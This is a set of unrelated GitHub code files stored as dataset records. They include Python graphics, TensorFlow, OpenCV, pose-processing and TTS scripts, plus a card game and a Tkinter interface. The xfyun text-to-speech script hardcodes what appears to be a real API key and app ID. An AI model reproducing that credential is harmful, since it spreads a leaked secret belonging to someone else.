liste de n tuples (x,y,s)\n dont les coordonnees sont comprise dans le rect\n tout en respectant un espacement minimum\"\"\"\n\n # On divise toutes les valeurs par le gap\n # Afin de s'assurer que les etoiles ne se touchent pas\n leftWG = math.ceil(left / gap)\n rightWG = math.floor((left + width) / gap)\n bottomWG = math.ceil(bottom / gap)\n topWG = math.floor((bottom + height) / gap)\n\n # On calcul l'ensemble des coordonnees possibles\n coordonnees = list(itertools.product(range(leftWG, rightWG + 1), range(bottomWG, topWG + 1)))\n\n # On selection n couples parmis les coordonnees possibles,\n # on re-multiplie les coordonnees precedemment divisee par le gap\n # et on genere une taille aleatoire\n return [(coor[0] * gap, coor[1] * gap, random.randint(10, 25)) for coor in random.sample(coordonnees, min(quantity, len(coordonnees)))]\n\n\ndef etoiles(infos, t):\n \"\"\"Dessine les etoiles de coordonnees et tailles definies\"\"\"\n t.clear()\n for info in infos:\n formes.etoile(info[0], info[1], info[2], (255, random.randint(200, 230), 0), t, w=1)\n\n # On actualise l'affichage toute les demie-secondes\n turtle.ontimer(lambda: etoiles(infos, t), t=500)\n\n\ndef bonhommeDeNeige(x, y, t, diametre=100):\n \"\"\"Dessine un bonhomme de neige\n Le parametre optionnel diametre correspond au diametre de la premiere boule de neige\"\"\"\n diametre2 = diametre * 0.75 # Diametre de la 2e\n diametre3 = diametre * 0.50 # Diametre de la 3e\n x2 = x + (diametre - diametre2) / 2 # Coordonnee x (du pt en bas à gauche) de la 2e boule de neige\n x3 = x + (diametre - diametre3) / 2 # Coordonnee x (du pt en bas à gauche) de la 3e boule 
de neige\n y2 = y + diametre2 # Coordonnee y (du pt en bas a gauche) de la 2e boule de neige\n y3 = y2 + diametre3 + (diametre / 10) # Coordonnee y (du pt en bas à gauche) de la 3e boule de neige\n\n # batons qui forment les bras du bonhomme de neige\n angleBaton = 30\n formes.rectangle(x2, y2 + diametre2 / 2, diametre / 2, diametre * 0.05, \"brown\", t, a=180 - angleBaton)\n formes.rectangle(x2 + diametre2, y2 + diametre2 / 2, diametre / 2, diametre * 0.05, \"brown\", t, a=angleBaton)\n\n # boules de neiges qui forment le corps du bonhomme\n formes.rond(x, y, diametre, \"white\", t)\n formes.rond(x2, y2, diametre2, \"white\", t)\n formes.rond(x3, y3, diametre3, \"white\", t)\n\n # carotte du bonhomme de neige\n hCarotte = diametre * 0.05\n formes.triangle(x3 + diametre3 / 2, y3 + diametre3 / 3 + hCarotte, hCarotte, \"orange\", t, a=80, aDepart=270)\n\n # yeux sur le corps du bonhomme\n rayonYeux = diametre * 0.03\n yYeux = y3 + 2 * diametre3 / 3\n formes.rond(x3 + diametre3 / 6 - rayonYeux, yYeux, rayonYeux * 2, \"black\", t)\n formes.rond(x3 + 5 * diametre3 / 6 - rayonYeux, yYeux, rayonYeux * 2, \"black\", t)\n\n # boutons sur le corps du bonhomme\n rayonBouton = diametre * 0.04\n ecartBoutons = diametre * 0.25\n yButton = y + ecartBoutons\n for i in range(3):\n formes.rond(x + diametre / 2 - rayonBouton, yButton + i * ecartBoutons, rayonBouton * 2, \"black\", t)\n\n return y3 + diametre3\n","repo_name":"Other-Project/PeiP1-Memory","sub_path":"decor.py","file_name":"decor.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"23944686260","text":"# Практическое задание №2:\n# Дана дата в формате dd.mm.yyyy, например: 02.11.2013. Ваша задача — вывести дату в текстовом виде,\n# например: второе ноября 2013 года.\n# Склонением пренебречь (2000 года, 2010 года)\n\ndays = {\n '01': 'первое', '11': 'одиннадцатое', '21': 'двадцать первое',\n '02': 'второе', '12': 'двенадцатое', '22': 'двадцать второе',\n '03': 'третье', '13': 'тринадцатое', '23': 'двадцать третье',\n '04': 'четвертое', '14': 'четырнадцатое', '24': 'двадцать четвертое',\n '05': 'пятое', '15': 'пятнадцатое', '25': 'двадцать пятое',\n '06': 'шестое', '16': 'шестнадцатое', '26': 'двадцать шестое',\n '07': 'седьмое', '17': 'семнадцатое', '27': 'двадцать седьмое',\n '08': 'восьмое', '18': 'восемнадцатое', '28': 'двадцать восьмое',\n '09': 'девятое', '19': 'девятнадцатое', '29': 'двадцать девятое',\n '10': 'десятое', '20': 'двадцатое', '30': 'тридцатое',\n '31': 'тридцать первое',\n}\n\nmonths = {\n '01': 'января', '07': 'июля',\n '02': 'февраля', '08': 'августа',\n '03': 'марта', '09': 'сентября',\n '04': 'апреля', '10': 'октября',\n '05': 'мая', '11': 'ноября',\n '06': 'июня', '12': 'декабря',\n}\n\nusers_date = input('Введите дату в формате ХХ.ХХ.ХХХХ:\\n>>> ')\nday, month, year = users_date.split('.')\n\nprint(f'{days[day]} {months[month]} {year} года')","repo_name":"AllIWantIsNotAvailable/GeekBrains_PythonLanguageBasics","sub_path":"Lesson4-BuiltIn_types_and_operations_with_them/Code/Practice_task/Practice_Task_05.py","file_name":"Practice_Task_05.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"10434392705","text":"\"\"\"\nARE YOU FAN OF HARRY POTTER...?\nProject By..Akshay7802.\nEnjoy..!!\n\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport time\n\n\n\n## Reading the webcam\ncap = cv2.VideoCapture(0)\n## Allowing System to 
sleep for 5 sec before webcam starts :\ntime.sleep(3)\ncount = 0\nbackground = 0\n## Capturing the background in range :\nfor i in range(60):\n ret,background = cap.read()\nbackground = np.flip(background,axis=1)\n\n## Reading the images from the webcam\nwhile(cap.isOpened()):\n ret, img = cap.read()\n if not ret:\n break\n count+=1\n img = np.flip(img,axis=1)\n\n ## Converting the color space from BGR(BLUE,GREEEN,RED) to HSV(HUE,SATURATION,VALUE)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n ## Generating mask to detect red color\n lowerRed = np.array([110,50,50])\n upperRed = np.array([120,255,255])\n masked1 = cv2.inRange(hsv,lowerRed,upperRed)\n\n lowerRed = np.array([120,50,50])\n upperRed = np.array([130,255,255])\n masked2 = cv2.inRange(hsv,lowerRed,upperRed)\n\n masked1 = masked1+masked2\n\n # Refining the mask corresponding to the detected red color\n masked1 = cv2.morphologyEx(masked1, cv2.MORPH_OPEN, np.ones((3,3),np.uint8),iterations=2)\n masked1 = cv2.dilate(masked1,np.ones((3,3),np.uint8),iterations = 1)\n masked2 = cv2.bitwise_not(masked1)\n\n # Generating the final output\n res1 = cv2.bitwise_and(background,background,mask=masked1)\n res2 = cv2.bitwise_and(img,img,mask=masked2)\n finalOutput = cv2.addWeighted(res1,1,res2,1,0)\n\n cv2.imshow(\"Harry Potter's invisible secret revealed\",finalOutput)\n ##key = cv2.waitKey(10)\n if(cv2.waitKey(1)==ord(\"q\")):#press q to stop.\n break\n","repo_name":"akshay7802/Invisible-opencv","sub_path":"invisible.py","file_name":"invisible.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"33866681490","text":"import tensorflow as tf\nimport numpy as np\n\n# tensorboard를 사용해보자!\nx_data = [[0, 0],\n [0, 1],\n [1, 0],\n [1, 1]]\ny_data = [0, 1, 1, 0]\n\nx_data = np.array(x_data, dtype=np.float32)\ny_data = np.reshape(y_data, newshape=[4, 1])\nX = tf.placeholder(dtype=tf.float32, shape=[None, 2])\nY = tf.placeholder(dtype=tf.float32, shape=[None, 1])\n\nwith tf.name_scope('layer1') as scope:\n W1 = tf.Variable(initial_value=tf.random_normal([2, 2]), dtype=tf.float32, name='weight1')\n b1 = tf.Variable(tf.random_normal([2]), dtype=tf.float32, name='bias1')\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\n w1_hist = tf.summary.histogram('weight1', W1) # select tensor to log\n l1_hist = tf.summary.histogram('layer1', layer1) # select tensor to log\nwith tf.name_scope('layer2') as scope:\n W2 = tf.Variable(initial_value=tf.random_normal([2, 1]), dtype=tf.float32, name='weight2')\n b2 = tf.Variable(tf.random_normal([1]), dtype=tf.float32, name='bias2')\n hx = tf.sigmoid(tf.matmul(layer1, W2) + b2)\n\ncost = - tf.reduce_mean(Y * tf.log(hx) + (1 - Y) * tf.log(1 - hx)) # 김성훈 교수님 강의\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)\ntrain = optimizer.minimize(cost)\npred = tf.cast(hx > 0.5, dtype=tf.float32)\nacc = tf.reduce_mean(tf.cast(tf.equal(pred, Y), tf.float32))\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n# w1_hist = tf.summary.histogram('weight1', W1) # select tensor to log\ncost_sum = tf.summary.scalar('cost', cost) # select tensor to log\nsummary = tf.summary.merge_all() # merge all summary\nwriter = tf.summary.FileWriter('./logs') # create writer, 이 타이밍에 파일 생성\n# writer.add_graph(sess.graph)\n\nfor step in range(501):\n # _, cost_val, acc_val = sess.run([train, cost, acc], feed_dict={X: x_data, Y: y_data})\n # w1_hist = tf.summary.histogram('weight1', W1) # select tensor to log\n # cost_sum = 
tf.summary.scalar('cost', cost) # select tensor to log\n # summary = tf.summary.merge_all() # merge all summary\n # writer = tf.summary.FileWriter('./logs') # create writer를 반복문 안에서 돌리지 말자.\n writer.add_graph(sess.graph) # 그래프 추가\n s, cost_val, _ = sess.run([summary, cost, train], feed_dict={X: x_data, Y: y_data})\n if step % 100 == 0:\n print(step, cost_val)\n writer.add_summary(s, global_step=step) # summary 추가\n\nW1_val, b1_val, W2_val, b2_val = sess.run([W1, b1, W2, b2])\nprint(W1_val)\nprint(b1_val)\nprint(W2_val)\nprint(b2_val)\n# print(acc_val)\n","repo_name":"SilverQ/dl_study","sub_path":"hunkim/lab09-2.py","file_name":"lab09-2.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32059544960","text":"import glob\nimport json\nimport os\nimport argparse\nimport numpy as np\nfrom PIL import Image, ImageDraw, ImageFont\nfrom sklearn.preprocessing import MinMaxScaler\n\nPOSE_BODY_25_PAIRS_RENDER_GPU = \\\n [1, 8, 1, 2, 1, 5, 2, 3, 3, 4, 5, 6, 6, 7, 8, 9, 9, 10, 10, 11,\n 8, 12, 12, 13, 13, 14, 1, 0, 0, 15, 15, 17, 0, 16, 16, 18, 14,\n 19, 19, 20, 14, 21, 11, 22, 22, 23, 11, 24]\n\nPOSE_BODY_25_COLORS_RENDER_GPU = \\\n [255, 0, 85,\n 255, 0, 0,\n 255, 85, 0,\n 255, 170, 0,\n 255, 255, 0,\n 170, 255, 0,\n 85, 255, 0,\n 0, 255, 0,\n 255, 0, 0,\n 0, 255, 85,\n 0, 255, 170,\n 0, 255, 255,\n 0, 170, 255,\n 0, 85, 255,\n 0, 0, 255,\n 255, 0, 170,\n 170, 0, 255,\n 255, 0, 255,\n 85, 0, 255,\n 0, 0, 255,\n 0, 0, 255,\n 0, 0, 255,\n 0, 255, 255,\n 0, 255, 255,\n 0, 255, 255]\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Convert poses to Parameter Space to Human Action Recognition\"\n )\n\n parser.add_argument(\"--poses_base_dir\", type=str,\n default='/home/murilo/dataset/KTH',\n help=\"Name of directory where input points are located.\")\n\n parser.add_argument(\"--input_dir\", type=str,\n default='2DPoses',\n help=\"Name of directory to output computed features.\")\n\n parser.add_argument(\"--output_dir\", type=str,\n default='2DPoses_SpaceParam',\n help=\"Name of directory to output computed features.\")\n\n parser.add_argument(\"--output_images_dir\", type=str,\n default='2DPoses_SpaceParam_Images',\n help=\"Name of directory to output Parameter Space images.\")\n\n parser.add_argument(\"--image_height\", type=int,\n default='240',\n help=\"(Frame Size)Image height to compute max distance in Parameter Space.\")\n\n parser.add_argument(\"--image_width\", type=int,\n default='320',\n help=\"(Frame Size)Image width to compute max distance in Parameter Space.\")\n\n parser.add_argument(\"--save_image\", type=int,\n default='1',\n help=\"Whether save image with points in Parameter Space.\")\n\n parser.add_argument(\"--draw_body_ids\", type=int,\n default='1',\n help=\"Whether draw body joint ids in image with points in Parameter Space.\")\n\n parser.add_argument(\"--perform_minmax\", type=int,\n default='0',\n help=\"Whether perform Min Max Scaler in data.\")\n\n args = parser.parse_args()\n convert_parameter_space(args)\n\n\ndef convert_parameter_space(args):\n # here compute image diagonal = max distance in Parameter Space\n max_distance = int(((args.image_height**2) + (args.image_width**2))**(1/2))\n print(max_distance)\n\n thetas = np.linspace(-np.pi / 2, np.pi / 2, 180)\n\n poses_dir = os.path.join(args.poses_base_dir, args.input_dir)\n\n frames_ctd = 0\n poses_files = sorted(glob.glob(poses_dir + \"/**/*.json\", recursive=True))\n print('Frames to process: %i' % 
len(poses_files))\n for poses_file in poses_files:\n if frames_ctd % 100 == 0:\n print('Frame: %i from: %i' % (frames_ctd, len(poses_files)))\n print(poses_file)\n\n body_parts = read_body_parts_file(poses_file)\n if len(body_parts) > 0:\n file_name_points = os.path.basename(poses_file)\n points_space_parameter_dir = poses_file.replace(args.input_dir, args.output_dir)\n points_space_parameter_dir = os.path.dirname(points_space_parameter_dir)\n points_space_parameter_name = os.path.join(points_space_parameter_dir, file_name_points)\n if not os.path.exists(points_space_parameter_dir):\n os.makedirs(points_space_parameter_dir)\n\n # compute parameter space points and draw image with points\n img_parameter_space, points_parameter_space \\\n = compute_parameter_space(body_parts, max_distance, thetas, args.draw_body_ids)\n\n if args.perform_minmax:\n scaler = MinMaxScaler()\n scaler.fit(np.array(list(points_parameter_space.values())))\n a = scaler.transform(np.array(list(points_parameter_space.values())))\n #points_parameter_space_norm = {}\n for i in range(0, 14, 1):\n points_parameter_space[i] = tuple(a[i])\n\n with open(points_space_parameter_name, 'w') as fjson:\n json.dump(points_parameter_space, fjson)\n\n if args.save_image:\n file_name_img = os.path.basename(poses_file)\n file_name_img = file_name_img.replace('_keypoints.json', '.png')\n img_space_parameter_dir = poses_file.replace(args.input_dir, args.output_images_dir)\n img_space_parameter_dir = os.path.dirname(img_space_parameter_dir)\n img_space_parameter_full_name = os.path.join(img_space_parameter_dir, file_name_img)\n if not os.path.exists(img_space_parameter_dir):\n os.makedirs(img_space_parameter_dir)\n img_parameter_space.save(img_space_parameter_full_name)\n\n frames_ctd = frames_ctd + 1\n\n\ndef read_body_parts_file(key_points_file):\n body_parts_int = {}\n\n # Read json pose points\n with open(key_points_file) as f:\n data = json.load(f)\n\n body_parts = data['part_candidates'][0]\n if len(body_parts) > 0:\n\n for key, value in body_parts.items():\n body_parts_int[int(key)] = [item for item in value]\n\n return body_parts_int\n\n\ndef compute_parameter_space(body_parts, max_distance, thetas, draw_body_ids=True):\n # Create image degrees x max_distance\n img_parameter_space = Image.new('RGB', (180 + 20, int(max_distance/2)), color='black')\n points_parameter_space = {}\n draw = ImageDraw.Draw(img_parameter_space)\n for i in range(0, 14, 1):\n degree = degree_disc = theta = rho1 = rho2 = 0\n x1, y1, x2, y2, color_id, id1, id2 = return_body_points_coord(i, body_parts)\n if x1 > 0 and y1 > 0 and x2 > 0 and y2 > 0:\n print(i)\n #print('x1:\\t%i\\ty1:\\t%i\\t\\tx2:\\t%i\\ty2:\\t%i' % (x1, y1, x2, y2))\n if y1 - y2 != 0:\n theta = np.arctan((x2 - x1) / (y1 - y2))\n else:\n theta = 0\n\n # here convert theta from radians to degrees\n degree = round(theta * (180 / np.pi))\n\n # here find theta in thetas discrete list (only for image plot)\n degree_disc = min(range(len(thetas)), key=lambda x: abs(thetas[x] - theta))\n # position_min_degree = min(thetas, key=lambda x: abs(x - theta))\n\n # compute rho from theta\n rho1 = x1 * np.cos(theta) + y1 * np.sin(theta)\n rho2 = x2 * np.cos(theta) + y2 * np.sin(theta)\n print(rho1, rho2)\n\n print(int(rho1), int(degree), x1, y1)\n # draw ellipse that represent body part in parameter space\n draw.ellipse((degree_disc - 6, abs(rho1) - 6, degree_disc + 6, abs(rho1) + 6), fill=get_color(color_id))\n # degree vs rho\n if draw_body_ids:\n font = 
ImageFont.truetype('/usr/share/fonts/truetype/freefont/FreeMono.ttf', 10)\n draw.text((degree, abs(rho1)), '%i-%i' % (id1, id2), font=font, fill=(255, 255, 255, 128))\n\n #print('theta Calc:\\t%.4f\\t\\trho Calc:\\t\\t%i' % (theta, rho1))\n #print('Theta Find:\\t%.4f\\t\\tAngulo:\\t\\t%.2f' % (position_min_degree, degree))\n #print('\\n')\n\n #points_parameter_space[i] = (degree_disc, rho1)\n points_parameter_space[i] = (degree, degree_disc, theta, int(rho1))\n\n return img_parameter_space, points_parameter_space\n\n\ndef return_body_points_coord(i, body_parts):\n x1 = y1 = x2 = y2 = x = color_id = id1 = id2 = 0\n if i == 0: # 1 => 0 Neck\n x = 13\n elif i == 1: # 1 => 8 Upper body\n x = 0\n elif i == 2: # 2 => 3 Right Arm\n x = 3\n elif i == 3: # 3 => 4 Right Forearm\n x = 4\n elif i == 4: # 5 => 6 Left Arm\n x = 5\n elif i == 5: # 6 => 7 Left Forearm\n x = 6\n elif i == 6: # 9 => 10 Right Thigh\n x = 8\n elif i == 7: # 10 => 11 Right Leg\n x = 9\n elif i == 8: # 12 => 13 Left Thigh\n x = 11\n elif i == 9: # 13 => 14 Left Leg\n x = 12\n elif i == 10: # 8 => 9 Right Hip\n x = 7\n elif i == 11: # 8 => 12 Left Hip\n x = 10\n elif i == 12: # 1 => 2 Right Shoulder\n x = 1\n elif i == 13: # 1 => 5 Left Shoulder\n x = 2\n\n x = x * 2\n if (len(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]]) > 0 and len(\n body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]]) > 0):\n x1, y1 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]])\n x2, y2 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]])\n color_id = POSE_BODY_25_PAIRS_RENDER_GPU[x + 1] * 3\n id1 = POSE_BODY_25_PAIRS_RENDER_GPU[x]\n id2 = POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]\n\n return x1, y1, x2, y2, color_id, id1, id2\n\n\ndef draw_body(body_parts, height, width):\n img = Image.new('RGB', (width, height), color='black')\n draw = ImageDraw.Draw(img)\n\n for k in sorted(body_parts):\n if len(body_parts[k]) > 0:\n x, y = get_max_prob(body_parts[k])\n draw.point((x, y), fill=get_color(k * 3))\n\n ctd = 0\n for x in range(0, len(POSE_BODY_25_PAIRS_RENDER_GPU), 2):\n print(x, x + 1)\n print(POSE_BODY_25_PAIRS_RENDER_GPU[x], POSE_BODY_25_PAIRS_RENDER_GPU[x + 1])\n print(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]], body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]])\n print('\\n')\n if (len(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]]) > 0 and len(\n body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]]) > 0):\n x1, y1 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]])\n x2, y2 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]])\n draw.line((x1, y1, x2, y2), fill=get_color(POSE_BODY_25_PAIRS_RENDER_GPU[x + 1] * 3), width=1)\n ctd = ctd + 1\n print(ctd)\n\n img.show()\n img.save('pil_red.png')\n\n\ndef get_max_prob(body_part):\n m = 0\n x = 0\n y = 0\n for p in range(0, len(body_part), 3):\n if body_part[p + 2] > m:\n m = float(body_part[p + 2])\n x = int(body_part[p])\n y = int(body_part[p + 1])\n\n return x, y\n\n\ndef get_color(k):\n return POSE_BODY_25_COLORS_RENDER_GPU[k], \\\n POSE_BODY_25_COLORS_RENDER_GPU[k + 1], \\\n POSE_BODY_25_COLORS_RENDER_GPU[k + 2]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"murilovarges/HARBoP","sub_path":"tools/ParameterSpaceConversion/convert_poses_parameter_space.py","file_name":"convert_poses_parameter_space.py","file_ext":"py","file_size_in_byte":10844,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"42268452643","text":"import os\nimport numpy as np\nimport torch\nfrom torch.utils.data import 
Dataset\n\n\nclass Dataset(Dataset):\n def __init__(self, path, mels_directory):\n data_files = np.loadtxt(path, dtype='str', delimiter='|')\n self.data_ids = data_files[:, 0]\n self.phonetics = data_files[:, 1]\n self.mels_directory = mels_directory\n\n def mels(self, id):\n file_path = os.path.join(self.mels_directory, id + '.npy')\n mels = torch.from_numpy(np.load(file_path))\n return mels\n\n\n def texts(self, phonetics):\n phonetics_id = [int(id) for id in phonetics.split()]\n return torch.IntTensor(phonetics_id)\n\n def mels_texts(self, path, phonetics):\n\n mels = self.mels(path)\n texts = self.texts(phonetics)\n return texts, mels\n\n def __getitem__(self, i):\n return self.mels_texts(self.data_ids[i], self.phonetics[i])\n\n def __len__(self):\n return len(self.data_ids)\n\n\nclass OrganizeData:\n\n def __init__(self, n_f_p_s):\n self.number_framesPerStep = n_f_p_s\n\n def __call__(self, batch):\n in_len, sorted_ids = torch.sort(\n torch.LongTensor([len(temp[0]) for temp in batch]),\n dim=0, descending=True)\n in_len_max = in_len[0]\n \n mels_len = batch[0][1].size(0)\n length_max = 0\n for i in range(len(sorted_ids)):\n length_max = max(length_max, batch[sorted_ids[i]][1].size(1))\n\n mod = length_max % self.number_framesPerStep\n\n if mod != 0:\n length_max = length_max + self.number_framesPerStep - mod\n\n padded_result = torch.FloatTensor(\n len(batch), length_max).zero_()\n\n padded_mel = torch.FloatTensor(\n len(batch), mels_len, length_max).zero_()\n\n out_len = torch.LongTensor(len(batch))\n\n for i, id in enumerate(sorted_ids):\n melspectogram = batch[id][1]\n padded_mel[i, :, :melspectogram.size(1)] = melspectogram\n out_len[i] = melspectogram.size(1)\n padded_result[i, melspectogram.size(1) - 1:] = 1\n\n padded_text = torch.LongTensor(len(batch), in_len_max)\n padded_text.zero_()\n for i,id in enumerate(sorted_ids):\n data = batch[id][0]\n padded_text[i, :data.size(0)] = data\n\n return padded_text, in_len, padded_mel, padded_result, out_len\n","repo_name":"ahmed-8areeb/tts","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36047305782","text":"from game.card import Card\n\n\nclass Director:\n \"\"\"A person who directs the game. \n \n The responsibility of a Director is to control the sequence of play.\n\n Attributes:\n current_card (Instance of a class): An instance of Card class.\n is_playing (boolean): Whether or not the game is being played.\n total_score (int): The score for the entire game.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new Director.\n \n Args:\n self (Director): an instance of Director.\n \"\"\"\n \n self.is_playing = True\n self.total_score = 300\n self.current_card = \"\"\n\n card = Card()\n self.current_card = card\n\n def start_game(self):\n \"\"\"Starts the game by running the main game loop.\n \n Args:\n self (Director): an instance of Director.\n \"\"\"\n while self.is_playing:\n self.get_inputs()\n self.do_updates()\n self.do_outputs()\n\n def get_inputs(self):\n \"\"\"Ask the user if they want to continue playing.\n\n Args:\n self (Director): An instance of Director.\n \"\"\"\n self.current_card.next_card()\n print(f\"The card is: {self.current_card.last_card} {self.current_card.last_suit}\")\n guess_card = input(\"Higher or lower? 
[h/l] \")\n self.is_playing = (guess_card == \"h\" or guess_card == \"l\")\n \n self.current_card.decision = guess_card\n\n \n def do_updates(self):\n \"\"\"Evaluates the player's decision and updates his score.\n\n Args:\n self (Director): An instance of Director.\n \"\"\"\n if not self.is_playing:\n return \n\n self.current_card.evaluate()\n self.current_card.next_card()\n\n self.total_score += self.current_card.points\n\n def do_outputs(self):\n \"\"\"Displays the next card's value and the score. \n Also asks the player if he want to play again. \n\n Args:\n self (Director): An instance of Director.\n \"\"\"\n if not self.is_playing:\n return\n \n\n print(f\"Next card was: {self.current_card.last_card} {self.current_card.last_suit}\")\n print(f\"Your score is: {self.total_score}\")\n self.is_playing = (self.total_score > 0)\n playagain = input(\"Play again? [y/n] \")\n self.is_playing = (playagain == \"y\")\n print()\n\n\n if not self.is_playing:\n print(\"Game Over!\")\n ","repo_name":"jacobsanchezbejarano/cse210-02","sub_path":"cardsgame/cards/game/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9354868810","text":"# -*- coding: utf-8 -*-\r\n\r\nimport base64\r\nimport json\r\nimport time\r\nimport hashlib\r\nimport requests\r\nimport os.path\r\nfrom sys import argv\r\nimport codecs\r\nimport subprocess\r\n\r\n\r\nclass xfyun_tts:\r\n api_url = \"http://api.xfyun.cn/v1/service/v1/tts\" # api url\r\n API_KEY = \"fbebb5e5550912b63b03e16491546484\" # APP KEY\r\n APP_ID = \"5c78da89\" # APP ID\r\n OUTPUT_PATH = \"./\" # out put path of voice file\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Params can find in https://doc.xfyun.cn/rest_api/%E8%AF%AD%E9%9F%B3%E5%90%88%E6%88%90.html\r\n \"\"\"\r\n self.Param = {\r\n \"auf\": \"audio/L16;rate=16000\", # voice rate\r\n \"aue\": \"lame\", # voice encoding. 
raw(wav) or lame(mp3)\r\n \"voice_name\": \"xiaoyan\", # xiaoyan x_xiaofeng\r\n \"speed\": \"50\", # voice speed [0,100]\r\n \"volume\": \"80\", # voice volume [0,100]\r\n \"pitch\": \"50\", # voice pitch [0,100]\r\n \"engine_type\": \"aisound\" # aisound | intp65 | intp65_en\r\n }\r\n\r\n def text_to_mp3(self, _text, _id):\r\n param_str = json.dumps(self.Param) # 得到明文字符串\r\n param_utf8 = param_str.encode('utf8') # 得到utf8编码(bytes类型)\r\n param_b64 = base64.b64encode(param_utf8) # 得到base64编码(bytes类型)\r\n param_b64str = param_b64.decode('utf8') # 得到base64字符串\r\n\r\n time_now = str(int(time.time()))\r\n checksum = (self.API_KEY + time_now + param_b64str).encode('utf8')\r\n checksum_md5 = hashlib.md5(checksum).hexdigest()\r\n header = {\r\n \"X-Appid\": self.APP_ID,\r\n \"X-CurTime\": time_now,\r\n \"X-Param\": param_b64str,\r\n \"X-CheckSum\": checksum_md5\r\n }\r\n\r\n body = {\r\n \"text\": _text\r\n }\r\n\r\n # HTTP POST\r\n response = requests.post(self.api_url, data=body, headers=header)\r\n response_head = response.headers['Content-Type']\r\n\r\n if response_head == \"audio/mpeg\":\r\n save_file = os.path.join(self.OUTPUT_PATH, _id + '.mp3')\r\n out_file = open(save_file, 'wb')\r\n data = response.content\r\n out_file.write(data)\r\n out_file.close()\r\n print('Out Put File: ' + save_file)\r\n else:\r\n print(response.content.decode('utf8'))\r\n\r\n\r\nif __name__ == '__main__':\r\n text = \"\"\r\n xftts = xfyun_tts()\r\n\r\n if len(argv) == 1: # no input file\r\n text = input(\"Please input the text:\")\r\n else:\r\n text_file = argv[1]\r\n if os.path.isfile(text_file):\r\n f = codecs.open(text_file, 'r', encoding='utf-8')\r\n text = f.read()\r\n f.close()\r\n else:\r\n text = argv[1]\r\n\r\n _l = len(text)\r\n seek = 300\r\n i = 0\r\n combinf = []\r\n if seek >= _l:\r\n xftts.text_to_mp3(text, str(i))\r\n else:\r\n while seek < _l:\r\n txt = text[seek - 300:seek]\r\n xftts.text_to_mp3(txt, str(i))\r\n combinf.append(str(i)+'.mp3')\r\n i += 1\r\n seek += 300\r\n if seek >= _l:\r\n seek = _l\r\n txt = text[seek - 300:seek]\r\n xftts.text_to_mp3(txt, str(i))\r\n combinf.append(str(i)+'.mp3')\r\n args = 'ffmpeg.exe -i \"concat:%s\" -acodec copy output.mp3' % '|'.join(combinf)\r\n subprocess.call(args, shell=True)\r\n","repo_name":"codingtoworld/xfyun_tts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"29808022881","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.geometry('870x290')\r\nroot.minsize(870, 290)\r\nroot.maxsize(870, 290)\r\n\r\nroot.title(\"Dweep Text Editor\")\r\n\r\nframe1 = Frame(root,bg = \"Black\", borderwidth=10)\r\nframe1.grid(sticky=\"nw\",padx=50) # giving padx for making space for bitmaps\r\n\r\nb1 = Button(frame1, text = \"File\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb1.grid(row=0 , column=0, sticky=\"e\")\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\")\r\nspace.grid(row=1 , column=0 , sticky=\"w\")\r\n\r\ntitle = Label(frame1, text = \"Your files:- \", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\ntitle.grid(row=2 , column=0 , sticky=\"w\")\r\n\r\nb3 = Button(frame1, text = \"Password Manager.txt\", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\nb3.grid(row=3 , column=0 , sticky=\"w\")\r\n\r\nb4 = Button(frame1, text = \"Tkinter_Practice.py\", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\nb4.grid(row=4 , column=0, sticky=\"w\")\r\n\r\nb5 = 
